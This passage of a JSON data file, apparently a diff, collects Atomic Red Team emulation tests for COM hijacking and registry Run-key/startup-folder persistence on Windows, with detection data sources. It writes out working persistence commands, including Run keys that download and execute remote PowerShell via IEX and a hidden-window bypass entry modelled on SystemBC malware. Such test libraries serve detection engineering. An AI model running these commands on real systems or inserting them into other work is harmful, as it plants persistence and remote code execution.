'HKCU:\\SOFTWARE\\Classes\\CLSID\\#{clsid}' -Value '#{clsid_description}'\nNew-Item -Path 'HKCU:\\SOFTWARE\\Classes\\CLSID\\#{clsid}\\InprocServer32' -Value $env:TEMP\\AtomicTest.dll\nNew-ItemProperty -Path 'HKCU:\\SOFTWARE\\Classes\\CLSID\\#{clsid}\\InprocServer32' -Name 'ThreadingModel' -Value '#{clsid_threading}' -PropertyType \"String\"\nStart-Process -FilePath \"C:\\Windows\\System32\\RUNDLL32.EXE\" -ArgumentList '-sta #{clsid}'", + "source": "atomics/T1546.015/T1546.015.yaml", + "name": "Atomic Red Team Test - Event Triggered Execution: Component Object Model Hijacking" + }, + { + "command": "New-Item -Path 'HKCU:\\SOFTWARE\\Classes\\CLSID\\{B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}' -Value '#{clsid_description}'\nNew-Item -Path 'HKCU:\\SOFTWARE\\Classes\\CLSID\\{B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}\\InprocServer32' -Value #{dllpath}\nNew-ItemProperty -Path 'HKCU:\\SOFTWARE\\Classes\\CLSID\\{B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}\\InprocServer32' -Name 'ThreadingModel' -Value '#{clsid_threading}' -PropertyType \"String\"\nStart-Process -FilePath \"C:\\Windows\\System32\\RUNDLL32.EXE\" -ArgumentList '-sta {B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}'", + "source": "atomics/T1546.015/T1546.015.yaml", + "name": "Atomic Red Team Test - Event Triggered Execution: Component Object Model Hijacking" + }, + { + "command": "New-Item -Path 'HKCU:\\SOFTWARE\\Classes\\CLSID\\#{clsid}' -Value 'MSAA AccPropServices'\nNew-Item -Path 'HKCU:\\SOFTWARE\\Classes\\CLSID\\#{clsid}\\InprocServer32' -Value #{dllpath}\nNew-ItemProperty -Path 'HKCU:\\SOFTWARE\\Classes\\CLSID\\#{clsid}\\InprocServer32' -Name 'ThreadingModel' -Value '#{clsid_threading}' -PropertyType \"String\"\nStart-Process -FilePath \"C:\\Windows\\System32\\RUNDLL32.EXE\" -ArgumentList '-sta #{clsid}'", + "source": "atomics/T1546.015/T1546.015.yaml", + "name": "Atomic Red Team Test - Event Triggered Execution: Component Object Model Hijacking" + }, + { + "command": "$o= [activator]::CreateInstance([type]::GetTypeFromCLSID(\"9BA05972-F6A8-11CF-A442-00A0C90A8F39\"))\n$item = $o.Item()\n$item.Document.Application.ShellExecute(\"cmd.exe\",\"/c calc.exe\",\"C:\\windows\\system32\",$null,0)\n", + "source": "atomics/T1546.015/T1546.015.yaml", + "name": "Atomic Red Team Test - Event Triggered Execution: Component Object Model Hijacking" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1546.015", + "display_name": "Event Triggered Execution: Component Object Model Hijacking", + "atomic_tests": [ + { + "name": "COM Hijacking - InprocServer32", + "auto_generated_guid": "48117158-d7be-441b-bc6a-d9e36e47b52b", + "description": "This test uses PowerShell to hijack a reference to a Component Object Model by creating registry values under InprocServer32 key in the HKCU hive then calling the Class ID to be executed via rundll32.exe.\n\nReference: https://bohops.com/2018/06/28/abusing-com-registry-structure-clsid-localserver32-inprocserver32/", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "clsid_threading": { + "description": "Threading Model", + "type": "string", + "default": "Apartment" + }, + "dllpath": { + "description": "Path to the DLL.", + "type": "String", + "default": "$env:TEMP\\AtomicTest.dll" + }, + "clsid": { + "description": "Class ID to hijack.", + "type": "string", + "default": "{B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}" + }, + "clsid_description": { + "description": "Description for CLSID", + "type": "string", + "default": "MSAA AccPropServices" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "DLL For testing", + "prereq_command": "if (Test-Path #{dllpath}) {exit 0} else {exit 1}", + "get_prereq_command": "Invoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/bin/AtomicTest.dll\" -OutFile \"#{dllpath}\"" + } + ], + "executor": { + "command": "New-Item -Path 'HKCU:\\SOFTWARE\\Classes\\CLSID\\#{clsid}' -Value '#{clsid_description}'\nNew-Item -Path 'HKCU:\\SOFTWARE\\Classes\\CLSID\\#{clsid}\\InprocServer32' -Value #{dllpath}\nNew-ItemProperty -Path 'HKCU:\\SOFTWARE\\Classes\\CLSID\\#{clsid}\\InprocServer32' -Name 'ThreadingModel' -Value '#{clsid_threading}' -PropertyType \"String\"\nStart-Process -FilePath \"C:\\Windows\\System32\\RUNDLL32.EXE\" -ArgumentList '-sta #{clsid}'", + "cleanup_command": "Remove-Item -Path 'HKCU:\\SOFTWARE\\Classes\\CLSID\\#{clsid}' -Recurse -ErrorAction Ignore", + "name": "powershell" + } + }, + { + "name": "Powershell Execute COM Object", + "auto_generated_guid": "752191b1-7c71-445c-9dbe-21bb031b18eb", + "description": "Use the PowerShell to execute COM CLSID object.\nReference: https://pentestlab.blog/2020/05/20/persistence-com-hijacking/", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$o= [activator]::CreateInstance([type]::GetTypeFromCLSID(\"9BA05972-F6A8-11CF-A442-00A0C90A8F39\"))\n$item = $o.Item()\n$item.Document.Application.ShellExecute(\"cmd.exe\",\"/c calc.exe\",\"C:\\windows\\system32\",$null,0)\n", + "cleanup_command": "Get-Process -Name \"*calc\" | Stop-Process\n", + "name": "powershell" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "module", + "definition": "Information about module files consisting of one or more classes and interfaces, such as portable executable (PE) format executables/dynamic link libraries (DLL), executable and linkable format (ELF) executables/shared libraries, and Mach-O format executables/shared libraries.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "module load", + "description": "A module was loaded into a process.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "module" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya", + "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module?view=netcore-3.1", + "https://docs.microsoft.com/en-us/windows/win32/debug/pe-format", + "https://elinux.org/Executable_and_Linkable_Format_(ELF)" + ] + ] + }, + { + "technique_id": "T1547.001", + "command_list": [ + "REG ADD \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Atomic Red Team\" /t REG_SZ /F /D \"C:\\Path\\AtomicRedTeam.exe\"\n", + "REG ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /d \"C:\\Path\\AtomicRedTeam.dll\"\n", + "$RunOnceKey = \"#{reg_key_path}\"\nset-itemproperty $RunOnceKey \"NextRun\" 'powershell.exe \"IEX (New-Object Net.WebClient).DownloadString(`\"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/36f83b728bc26a49eacb0535edc42be8c377ac54/ARTifacts/Misc/Discovery.bat`\")\"'\n", + "$RunOnceKey = \"HKLM:\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\"\nset-itemproperty $RunOnceKey \"NextRun\" '#{thing_to_execute} \"IEX (New-Object Net.WebClient).DownloadString(`\"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/36f83b728bc26a49eacb0535edc42be8c377ac54/ARTifacts/Misc/Discovery.bat`\")\"'\n", + "Copy-Item $PathToAtomicsFolder\\T1547.001\\src\\vbsstartup.vbs \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\vbsstartup.vbs\"\nCopy-Item $PathToAtomicsFolder\\T1547.001\\src\\vbsstartup.vbs \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\vbsstartup.vbs\"\ncscript.exe \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\vbsstartup.vbs\"\ncscript.exe \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\vbsstartup.vbs\"\n", + "Copy-Item $PathToAtomicsFolder\\T1547.001\\src\\jsestartup.jse \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jsestartup.jse\"\nCopy-Item $PathToAtomicsFolder\\T1547.001\\src\\jsestartup.jse \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\jsestartup.jse\"\ncscript.exe /E:Jscript \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jsestartup.jse\"\ncscript.exe /E:Jscript \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\jsestartup.jse\"\n", + "Copy-Item $PathToAtomicsFolder\\T1547.001\\src\\batstartup.bat \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\batstartup.bat\"\nCopy-Item $PathToAtomicsFolder\\T1547.001\\src\\batstartup.bat \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\batstartup.bat\"\nStart-Process \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\batstartup.bat\"\nStart-Process \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\batstartup.bat\"\n", + "$Target = \"C:\\Windows\\System32\\calc.exe\"\n$ShortcutLocation = \"$home\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\calc_exe.lnk\"\n$WScriptShell = New-Object -ComObject WScript.Shell\n$Create = $WScriptShell.CreateShortcut($ShortcutLocation)\n$Create.TargetPath = $Target\n$Create.Save() ", + "reg ADD \"HKCR\\CLSID\\{645FF040-5081-101B-9F08-00AA002F954E}\\shell\\open\\command\" /ve /d \"calc.exe\" /f", + "$RunKey = \"#{reg_key_path}\"\nSet-ItemProperty -Path $RunKey -Name \"socks5_powershell\" -Value \"powershell.exe -windowstyle hidden -ExecutionPolicy Bypass -File\"\n", + "$RunKey = \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\"\nSet-ItemProperty -Path $RunKey -Name \"socks5_powershell\" -Value \"#{reg_key_value}\"\n" + ], + "commands": [ + { + "command": "REG ADD \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Atomic Red Team\" /t REG_SZ /F /D \"C:\\Path\\AtomicRedTeam.exe\"\n", + "source": "atomics/T1547.001/T1547.001.yaml", + "name": "Atomic Red Team Test - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" + }, + { + "command": "REG ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /d \"C:\\Path\\AtomicRedTeam.dll\"\n", + "source": "atomics/T1547.001/T1547.001.yaml", + "name": "Atomic Red Team Test - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" + }, + { + "command": "$RunOnceKey = \"#{reg_key_path}\"\nset-itemproperty $RunOnceKey \"NextRun\" 'powershell.exe \"IEX (New-Object Net.WebClient).DownloadString(`\"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/36f83b728bc26a49eacb0535edc42be8c377ac54/ARTifacts/Misc/Discovery.bat`\")\"'\n", + "source": "atomics/T1547.001/T1547.001.yaml", + "name": "Atomic Red Team Test - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" + }, + { + "command": "$RunOnceKey = \"HKLM:\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\"\nset-itemproperty $RunOnceKey \"NextRun\" '#{thing_to_execute} \"IEX (New-Object Net.WebClient).DownloadString(`\"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/36f83b728bc26a49eacb0535edc42be8c377ac54/ARTifacts/Misc/Discovery.bat`\")\"'\n", + "source": "atomics/T1547.001/T1547.001.yaml", + "name": "Atomic Red Team Test - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" + }, + { + "command": "Copy-Item $PathToAtomicsFolder\\T1547.001\\src\\vbsstartup.vbs \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\vbsstartup.vbs\"\nCopy-Item $PathToAtomicsFolder\\T1547.001\\src\\vbsstartup.vbs \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\vbsstartup.vbs\"\ncscript.exe \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\vbsstartup.vbs\"\ncscript.exe \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\vbsstartup.vbs\"\n", + "source": "atomics/T1547.001/T1547.001.yaml", + "name": "Atomic Red Team Test - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" + }, + { + "command": "Copy-Item $PathToAtomicsFolder\\T1547.001\\src\\jsestartup.jse \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jsestartup.jse\"\nCopy-Item $PathToAtomicsFolder\\T1547.001\\src\\jsestartup.jse \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\jsestartup.jse\"\ncscript.exe /E:Jscript \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jsestartup.jse\"\ncscript.exe /E:Jscript \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\jsestartup.jse\"\n", + "source": "atomics/T1547.001/T1547.001.yaml", + "name": "Atomic Red Team Test - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" + }, + { + "command": "Copy-Item $PathToAtomicsFolder\\T1547.001\\src\\batstartup.bat \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\batstartup.bat\"\nCopy-Item $PathToAtomicsFolder\\T1547.001\\src\\batstartup.bat \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\batstartup.bat\"\nStart-Process \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\batstartup.bat\"\nStart-Process \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\batstartup.bat\"\n", + "source": "atomics/T1547.001/T1547.001.yaml", + "name": "Atomic Red Team Test - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" + }, + { + "command": "$Target = \"C:\\Windows\\System32\\calc.exe\"\n$ShortcutLocation = \"$home\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\calc_exe.lnk\"\n$WScriptShell = New-Object -ComObject WScript.Shell\n$Create = $WScriptShell.CreateShortcut($ShortcutLocation)\n$Create.TargetPath = $Target\n$Create.Save() ", + "source": "atomics/T1547.001/T1547.001.yaml", + "name": "Atomic Red Team Test - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" + }, + { + "command": "reg ADD \"HKCR\\CLSID\\{645FF040-5081-101B-9F08-00AA002F954E}\\shell\\open\\command\" /ve /d \"calc.exe\" /f", + "source": "atomics/T1547.001/T1547.001.yaml", + "name": "Atomic Red Team Test - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" + }, + { + "command": "$RunKey = \"#{reg_key_path}\"\nSet-ItemProperty -Path $RunKey -Name \"socks5_powershell\" -Value \"powershell.exe -windowstyle hidden -ExecutionPolicy Bypass -File\"\n", + "source": "atomics/T1547.001/T1547.001.yaml", + "name": "Atomic Red Team Test - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" + }, + { + "command": "$RunKey = \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\"\nSet-ItemProperty -Path $RunKey -Name \"socks5_powershell\" -Value \"#{reg_key_value}\"\n", + "source": "atomics/T1547.001/T1547.001.yaml", + "name": "Atomic Red Team Test - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1547.001", + "display_name": "Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder", + "atomic_tests": [ + { + "name": "Reg Key Run", + "auto_generated_guid": "e55be3fd-3521-4610-9d1a-e210e42dcf05", + "description": "Run Key Persistence\n\nUpon successful execution, cmd.exe will modify the registry by adding \\\"Atomic Red Team\\\" to the Run key. Output will be via stdout. \n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "command_to_execute": { + "description": "Thing to Run", + "type": "Path", + "default": "C:\\Path\\AtomicRedTeam.exe" + } + }, + "executor": { + "command": "REG ADD \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Atomic Red Team\" /t REG_SZ /F /D \"#{command_to_execute}\"\n", + "cleanup_command": "REG DELETE \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Atomic Red Team\" /f >nul 2>&1\n", + "name": "command_prompt" + } + }, + { + "name": "Reg Key RunOnce", + "auto_generated_guid": "554cbd88-cde1-4b56-8168-0be552eed9eb", + "description": "RunOnce Key Persistence.\n\nUpon successful execution, cmd.exe will modify the registry to load AtomicRedTeam.dll to RunOnceEx. Output will be via stdout. \n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "thing_to_execute": { + "description": "Thing to Run", + "type": "Path", + "default": "C:\\Path\\AtomicRedTeam.dll" + } + }, + "executor": { + "command": "REG ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /d \"#{thing_to_execute}\"\n", + "cleanup_command": "REG DELETE HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /f >nul 2>&1\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "PowerShell Registry RunOnce", + "auto_generated_guid": "eb44f842-0457-4ddc-9b92-c4caa144ac42", + "description": "RunOnce Key Persistence via PowerShell\nUpon successful execution, a new entry will be added to the runonce item in the registry.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "thing_to_execute": { + "description": "Thing to Run", + "type": "Path", + "default": "powershell.exe" + }, + "reg_key_path": { + "description": "Path to registry key to update", + "type": "Path", + "default": "HKLM:\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce" + } + }, + "executor": { + "command": "$RunOnceKey = \"#{reg_key_path}\"\nset-itemproperty $RunOnceKey \"NextRun\" '#{thing_to_execute} \"IEX (New-Object Net.WebClient).DownloadString(`\"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/36f83b728bc26a49eacb0535edc42be8c377ac54/ARTifacts/Misc/Discovery.bat`\")\"'\n", + "cleanup_command": "Remove-ItemProperty -Path #{reg_key_path} -Name \"NextRun\" -Force -ErrorAction Ignore\n", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "Suspicious vbs file run from startup Folder", + "auto_generated_guid": "2cb98256-625e-4da9-9d44-f2e5f90b8bd5", + "description": "vbs files can be placed in and ran from the startup folder to maintain persistance. Upon execution, \"T1547.001 Hello, World VBS!\" will be displayed twice. \nAdditionally, the new files can be viewed in the \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\"\nfolder and will also run when the computer is restarted and the user logs in.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "Copy-Item $PathToAtomicsFolder\\T1547.001\\src\\vbsstartup.vbs \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\vbsstartup.vbs\"\nCopy-Item $PathToAtomicsFolder\\T1547.001\\src\\vbsstartup.vbs \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\vbsstartup.vbs\"\ncscript.exe \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\vbsstartup.vbs\"\ncscript.exe \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\vbsstartup.vbs\"\n", + "cleanup_command": "Remove-Item \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\vbsstartup.vbs\" -ErrorAction Ignore\nRemove-Item \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\vbsstartup.vbs\" -ErrorAction Ignore\n", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "Suspicious jse file run from startup Folder", + "auto_generated_guid": "dade9447-791e-4c8f-b04b-3a35855dfa06", + "description": "jse files can be placed in and ran from the startup folder to maintain persistance.\nUpon execution, \"T1547.001 Hello, World JSE!\" will be displayed twice. \nAdditionally, the new files can be viewed in the \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\"\nfolder and will also run when the computer is restarted and the user logs in.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "Copy-Item $PathToAtomicsFolder\\T1547.001\\src\\jsestartup.jse \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jsestartup.jse\"\nCopy-Item $PathToAtomicsFolder\\T1547.001\\src\\jsestartup.jse \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\jsestartup.jse\"\ncscript.exe /E:Jscript \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jsestartup.jse\"\ncscript.exe /E:Jscript \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\jsestartup.jse\"\n", + "cleanup_command": "Remove-Item \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jsestartup.jse\" -ErrorAction Ignore\nRemove-Item \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\jsestartup.jse\" -ErrorAction Ignore\n", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "Suspicious bat file run from startup Folder", + "auto_generated_guid": "5b6768e4-44d2-44f0-89da-a01d1430fd5e", + "description": "bat files can be placed in and executed from the startup folder to maintain persistance.\nUpon execution, cmd will be run and immediately closed. Additionally, the new files can be viewed in the \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\"\nfolder and will also run when the computer is restarted and the user logs in.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "Copy-Item $PathToAtomicsFolder\\T1547.001\\src\\batstartup.bat \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\batstartup.bat\"\nCopy-Item $PathToAtomicsFolder\\T1547.001\\src\\batstartup.bat \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\batstartup.bat\"\nStart-Process \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\batstartup.bat\"\nStart-Process \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\batstartup.bat\"\n", + "cleanup_command": "Remove-Item \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\batstartup.bat\" -ErrorAction Ignore\nRemove-Item \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\batstartup.bat\" -ErrorAction Ignore\n", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "Add Executable Shortcut Link to User Startup Folder", + "auto_generated_guid": "24e55612-85f6-4bd6-ae74-a73d02e3441d", + "description": "Adds a non-malicious executable shortcut link to the current users startup directory. Test can be verified by going to the users startup directory and checking if the shortcut link exists. ", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$Target = \"C:\\Windows\\System32\\calc.exe\"\n$ShortcutLocation = \"$home\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\calc_exe.lnk\"\n$WScriptShell = New-Object -ComObject WScript.Shell\n$Create = $WScriptShell.CreateShortcut($ShortcutLocation)\n$Create.TargetPath = $Target\n$Create.Save() ", + "cleanup_command": "Remove-Item \"$home\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\calc_exe.lnk\" -ErrorAction Ignore", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "Add persistance via Recycle bin", + "auto_generated_guid": "bda6a3d6-7aa7-4e89-908b-306772e9662f", + "description": "Add a persistance via Recycle bin [vxunderground](https://github.com/vxunderground/VXUG-Papers/blob/main/The%20Persistence%20Series/Persistence%20via%20Recycle%20Bin/Persistence_via_Recycle_Bin.pdf)\nUser have to clic on the recycle bin to lauch the payload (here calc)\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "reg ADD \"HKCR\\CLSID\\{645FF040-5081-101B-9F08-00AA002F954E}\\shell\\open\\command\" /ve /d \"calc.exe\" /f", + "cleanup_command": "reg DELETE \"HKCR\\CLSID\\{645FF040-5081-101B-9F08-00AA002F954E}\\shell\\open\" /f", + "name": "command_prompt" + } + }, + { + "name": "SystemBC Malware-as-a-Service Registry", + "auto_generated_guid": "9dc7767b-30c1-4cc4-b999-50cab5e27891", + "description": "This Atomic will create a registry key called socks5_powershell for persistance access\nhttps://medium.com/walmartglobaltech/systembc-powershell-version-68c9aad0f85c\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "reg_key_value": { + "description": "Thing to Run", + "type": "Path", + "default": "powershell.exe -windowstyle hidden -ExecutionPolicy Bypass -File" + }, + "reg_key_path": { + "description": "Path to registry key to update", + "type": "Path", + "default": "HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" + } + }, + "executor": { + "command": "$RunKey = \"#{reg_key_path}\"\nSet-ItemProperty -Path $RunKey -Name \"socks5_powershell\" -Value \"#{reg_key_value}\"\n", + "cleanup_command": "Remove-ItemProperty -Path #{reg_key_path} -Name \"socks5_powershell\" -Force -ErrorAction Ignore\n", + "name": "powershell" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key creation", + "description": "A registry key was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key creation", + "description": "A registry key was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + 